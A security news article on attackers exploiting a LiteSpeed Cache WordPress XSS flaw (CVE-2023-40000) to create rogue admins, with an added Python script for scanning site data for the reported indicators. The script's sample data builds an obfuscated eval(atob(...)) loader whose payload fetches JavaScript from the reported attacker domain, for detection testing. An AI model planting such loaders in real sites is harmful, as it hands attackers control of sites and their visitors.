Cyber security news for all


    Hackers Exploit LiteSpeed Cache Flaw to Gain Full Control of WordPress Sites

    A high-severity vulnerability in the LiteSpeed Cache plugin for WordPress is being actively exploited by threat actors to create rogue administrator accounts on vulnerable sites.

    The findings come from WPScan, which reports that the flaw (CVE-2023-40000, CVSS score 8.3) has been abused to create bogus admin users named "wpsupp‑user" and "wp‑configuser".

    CVE-2023-40000, disclosed by Patchstack in February 2024, is a stored cross-site scripting (XSS) vulnerability that can let an unauthenticated user escalate privileges by sending specially crafted HTTP requests.

    The bug had already been fixed in October 2023 with version 5.7.0.1, before the public disclosure. The most recent release of the plugin, version 6.2.0.1, was published on April 25, 2024.

    LiteSpeed Cache has more than 5 million active installations. Plugin statistics indicate that 16.8% of installations still run a version other than 5.7, 6.0, 6.1, or 6.2, meaning they predate the patch and remain exposed.

    According to the Automattic-owned company, the malware typically injects into WordPress files JavaScript that is loaded from attacker-controlled domains such as dns.startservicefounds[.]com and api.startservicefounds[.]com.

    Creating administrator accounts on a WordPress site has serious consequences: it gives the threat actors full control of the site and lets them carry out arbitrary actions, from injecting malware to installing malicious plugins.

    To reduce the risk, users are advised to apply the latest patches, review all installed plugins, and remove any suspicious files or directories.

    “Conduct a thorough examination of the database for suspicious strings like ‘eval(atob(Strings.fromCharCode,'” advised WPScan, emphasizing scrutiny of the ‘litespeed.admin_display.messages’ option.
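    The following is an added example, not code from WPScan, LiteSpeed, or the article: a small Python triage script that applies the indicators listed above to data an incident responder would export from a WordPress site. It assumes wp_options has been loaded as a name-to-value dict and the user list as (user_login, role) tuples; the injected loader it decodes is a constructed sample, not a real capture. It searches for the eval(atob(String.fromCharCode loader (the correct JavaScript name is String.fromCharCode; the regex also tolerates the "Strings" spelling used in the quoted advice), decodes the hidden payload, checks for the reported domains, flags script markup in the litespeed.admin_display.messages option, and lists administrators with the known rogue logins.

```python
import base64
import re

# Indicators of compromise reported by WPScan for the CVE-2023-40000 campaign.
ROGUE_ADMIN_LOGINS = {"wpsupp-user", "wp-configuser"}
IOC_DOMAINS = ("dns.startservicefounds.com", "api.startservicefounds.com")
OPTION_OF_INTEREST = "litespeed.admin_display.messages"

# The injected loader has the shape eval(atob(String.fromCharCode(<codes>))):
# the char codes spell out a base64 string, atob() decodes it and eval() runs it.
# "Strings?" tolerates the spelling in the quoted WPScan advice as well as real JS.
EVAL_ATOB_RE = re.compile(
    r"eval\s*\(\s*atob\s*\(\s*Strings?\.fromCharCode\s*\(([\d\s,]+)\)", re.I
)


def decode_eval_atob(text):
    """Return the JavaScript hidden in an eval(atob(String.fromCharCode(...))) loader, or None."""
    m = EVAL_ATOB_RE.search(text)
    if not m:
        return None
    codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
    b64 = "".join(chr(c) for c in codes)
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: not valid base64
        return None


def scan_text(label, text):
    """Flag IoCs in one blob of text (an option value, a theme file, a post body)."""
    findings = []
    if EVAL_ATOB_RE.search(text):
        findings.append((label, "eval(atob(String.fromCharCode loader present"))
    decoded = decode_eval_atob(text) or ""
    for domain in IOC_DOMAINS:
        # Check both the raw text and the decoded payload: the domain is usually
        # only visible after the base64 layer is stripped.
        if domain in text or domain in decoded:
            findings.append((label, "references " + domain))
    return findings


def scan_options(options):
    """options: {option_name: option_value}, as exported from the wp_options table."""
    findings = []
    for name, value in options.items():
        label = "wp_options:" + name
        findings.extend(scan_text(label, value))
        if name == OPTION_OF_INTEREST and "<script" in value.lower():
            findings.append((label, "plugin notice option carries <script> markup"))
    return findings


def scan_users(users):
    """users: iterable of (user_login, role) from wp_users joined with wp_usermeta."""
    return [
        (login, "administrator with known rogue login")
        for login, role in users
        if role == "administrator" and login in ROGUE_ADMIN_LOGINS
    ]


# --- Constructed sample data (hypothetical; not taken from a real compromised site) ---
_PAYLOAD = (
    "var s=document.createElement('script');"
    "s.src='https://dns.startservicefounds.com/x.js';document.head.appendChild(s);"
)
_B64 = base64.b64encode(_PAYLOAD.encode()).decode()
SAMPLE_LOADER = "<script>eval(atob(String.fromCharCode(%s)))</script>" % ",".join(
    str(ord(ch)) for ch in _B64
)
SAMPLE_OPTIONS = {
    "siteurl": "https://example.com",
    "litespeed.admin_display.messages": SAMPLE_LOADER,
}
SAMPLE_USERS = [("alice", "administrator"), ("wpsupp-user", "administrator"), ("bob", "editor")]


if __name__ == "__main__":
    for label, reason in scan_options(SAMPLE_OPTIONS) + scan_users(SAMPLE_USERS):
        print(label + ": " + reason)
    print("decoded loader:", decode_eval_atob(SAMPLE_LOADER))
```

On a live site the same functions can be fed the output of `wp option list --format=json` and `wp user list --fields=user_login,roles` (WP-CLI), or a database dump; a hit on the domains or the loader pattern in any option, post, or theme file is a stronger signal than the rogue usernames alone, since attackers can rename accounts.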

    The disclosure coincides with Sucuri's report on a redirect campaign dubbed Mal.Metrica, which plants fake CAPTCHA verification prompts on compromised WordPress sites. Visitors who click through are redirected to scam and unwanted destinations that push dubious software downloads or trick them into handing over personal information in exchange for supposed rewards.

    “While this prompt may appear to be a routine human-verification measure, it is, in fact, wholly spurious — aiming to deceive users into clicking the button, thereby initiating a redirect to malevolent and deceptive websites,” elucidated security researcher Ben Martin.

    Like Balada Injector, the campaign takes advantage of recently disclosed flaws in WordPress plugins to inject external scripts that masquerade as content delivery networks (CDNs) or web analytics services. Mal.Metrica has infected 17,449 websites so far in 2024.

    “Owners of WordPress websites may wish to contemplate enabling automatic updates for core files, plugins, and themes,” recommended Martin. “Moreover, ordinary web users should exercise caution when encountering links that seem incongruous or suspect.”
